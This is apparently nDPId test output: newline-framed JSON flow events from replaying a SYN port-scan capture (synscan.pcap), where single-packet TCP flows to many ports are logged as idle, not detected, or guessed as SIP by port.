-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 